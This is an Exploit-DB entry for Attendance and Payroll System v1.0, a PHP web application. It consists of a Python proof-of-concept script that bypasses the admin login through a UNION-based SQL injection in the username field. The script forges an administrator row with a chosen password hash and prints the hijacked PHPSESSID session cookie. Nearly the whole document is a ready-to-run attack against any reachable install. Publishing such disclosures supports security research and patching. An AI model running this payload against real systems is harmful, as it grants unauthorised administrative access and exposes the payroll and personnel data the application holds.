Attendance and Payroll System v1.0 - SQLi Authentication Bypass

EDB-ID:

50802

CVE:

N/A


Author:

pr0z

Type:

webapps


Platform:

PHP

Date:

2022-03-07


# Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass
# Date: 04/03/2022
# Exploit Author: pr0z
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
# Version: v1.0
# Tested on: Linux, MySQL, Apache

import requests
import sys
from requests.exceptions import ConnectionError


print('\n    >> Attendance and Payroll System v1.0')
print('    >> Authentication Bypass through SQL injection')
print('    >> By pr0z\n')

login_path = '/apsystem/admin/login.php'
index_path = '/apsystem/admin/index.php'

payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


# Check for arguments
if len(sys.argv) < 2 or '-h' in sys.argv:
    print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")
    sys.exit()

# Bypass Authentication
target = sys.argv[1]
print("[+] Extracting Administrator cookie using SQLi ...")
sess = requests.Session()
try:
    sess.get(target + index_path,headers=headers, verify=False)
    sess.post(target + login_path, data=payload, headers=headers,verify=False)
except ConnectionError:
    print('[-] We were unable to establish a connection')
    sys.exit()

cookie_val = sess.cookies.get_dict().get("PHPSESSID")

print("[+] Use the following cookie:\n")
print(f"PHPSESSID: {cookie_val}")